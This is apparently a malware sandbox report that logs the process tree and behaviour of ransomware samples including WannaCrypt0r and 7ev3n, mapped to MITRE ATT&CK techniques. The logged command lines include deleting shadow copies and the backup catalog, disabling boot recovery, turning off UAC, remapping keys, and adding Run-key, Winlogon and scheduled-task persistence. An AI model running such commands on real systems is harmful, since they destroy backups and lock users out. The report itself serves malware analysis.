PID:4420 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet5⤵
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- System Location Discovery: System Language Discovery
PID:4972
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3992
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4716
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2068 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+buy+bitcoin4⤵PID:5984
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0x40,0x124,0x7ffe4e1e46f8,0x7ffe4e1e4708,0x7ffe4e1e47185⤵PID:4336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1500,15108247692219336990,11091018223489662314,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:25⤵PID:3372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,15108247692219336990,11091018223489662314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:1600
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+buy+bitcoin4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:3380 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0xfc,0x108,0x124,0x12c,0x7ffe4e1e46f8,0x7ffe4e1e4708,0x7ffe4e1e47185⤵PID:5400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:25⤵PID:948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:4356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:85⤵PID:6268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:15⤵PID:6744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:15⤵PID:6752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:15⤵PID:7028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:15⤵PID:7160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:15⤵PID:5664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:15⤵PID:7040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3776 /prefetch:85⤵PID:5288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3776 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:5532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:15⤵PID:6540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:15⤵PID:6820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:15⤵PID:6296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:15⤵PID:4860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1520,12487626532133027005,10822712785412245731,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4964 /prefetch:25⤵PID:6456
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://en.wikipedia.org/wiki/Bitcoin4⤵PID:4152
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf0,0x124,0x7ffe4e1e46f8,0x7ffe4e1e4708,0x7ffe4e1e47185⤵PID:5332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,10235531536735374737,9504437076346155919,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:25⤵PID:5680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,10235531536735374737,9504437076346155919,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:408
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qyedrxmniilpouj597" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\tasksche.exe\"" /f3⤵
- System Location Discovery: System Language Discovery
PID:4492 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "qyedrxmniilpouj597" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\tasksche.exe\"" /f4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5532
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6984
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6464
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6208
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5548
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1968
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1928
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:532
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6388
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6760
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6660
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4076
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6100
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]3⤵PID:7000
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]PID:4596
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\taskdl.exetaskdl.exe3⤵PID:2536
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Winlocker.VB6.Blacksod.zip\[email protected]"C:\Users\Admin\AppData\Local\Temp\Temp1_Winlocker.VB6.Blacksod.zip\[email protected]"2⤵
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5188 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\Temp1_Winlocker.VB6.Blacksod.zip\[email protected] SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\Temp1_Winlocker.VB6.Blacksod.zip\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "3⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5240
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Xyeta.zip\[email protected]"C:\Users\Admin\AppData\Local\Temp\Temp1_Xyeta.zip\[email protected]"2⤵
- System Location Discovery: System Language Discovery
PID:5612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 4483⤵
- Program crash
PID:1144
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_7ev3n.zip\[email protected]"C:\Users\Admin\AppData\Local\Temp\Temp1_7ev3n.zip\[email protected]"2⤵
- System Location Discovery: System Language Discovery
PID:6672 -
C:\Users\Admin\AppData\Local\system.exe"C:\Users\Admin\AppData\Local\system.exe"3⤵PID:4640
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat4⤵PID:6364
-
-
C:\Windows\SysWOW64\SCHTASKS.exeC:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2536
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵PID:6608
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵PID:7244
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:644⤵PID:624
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:645⤵PID:6920
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:644⤵PID:7036
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:645⤵PID:7216
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:644⤵PID:4548
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:645⤵PID:7232
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:644⤵PID:1572
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:645⤵PID:7224
-
-
-
C:\windows\SysWOW64\cmd.exeC:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:644⤵PID:6924
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:645⤵PID:7264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:644⤵PID:7480
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:645⤵PID:7564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f4⤵PID:7588
-
C:\Windows\SysWOW64\shutdown.exeshutdown -r -t 10 -f5⤵PID:7640
-
-
-
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Public\Desktop\@[email protected]"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6712
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Public\Desktop\@[email protected]"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1160
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Public\Desktop\@[email protected]"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:872
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Public\Desktop\@[email protected]"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6684
-
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Public\Desktop\@[email protected]"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6856
-
-
C:\Windows\system32\mspaint.exePID:6452
-
-
C:\Windows\system32\mspaint.exePID:5872
-
-
C:\Windows\system32\mspaint.exePID:4428
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3948
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5108
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2436
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:1512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:4892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4612
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:4100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:6092
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Modifies WinLogon for persistence
- Enumerates connected drives
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 08CB90BDE8834BB3A2514E5313AC362A2⤵
- Loads dropped DLL
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:5032
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 11955E3768008C571FC30E1765A5B737 E Global\MSI00002⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1460
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:6136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5612 -ip 56121⤵PID:6364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:5924
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38b3855 /state1:0x41c64e6d1⤵PID:7844
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
1File Deletion
1Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD520ef23a3fdf5b65ce2c659d724d4a274
SHA18058e388c0f79152d6775c20dc8cef20fee937f2
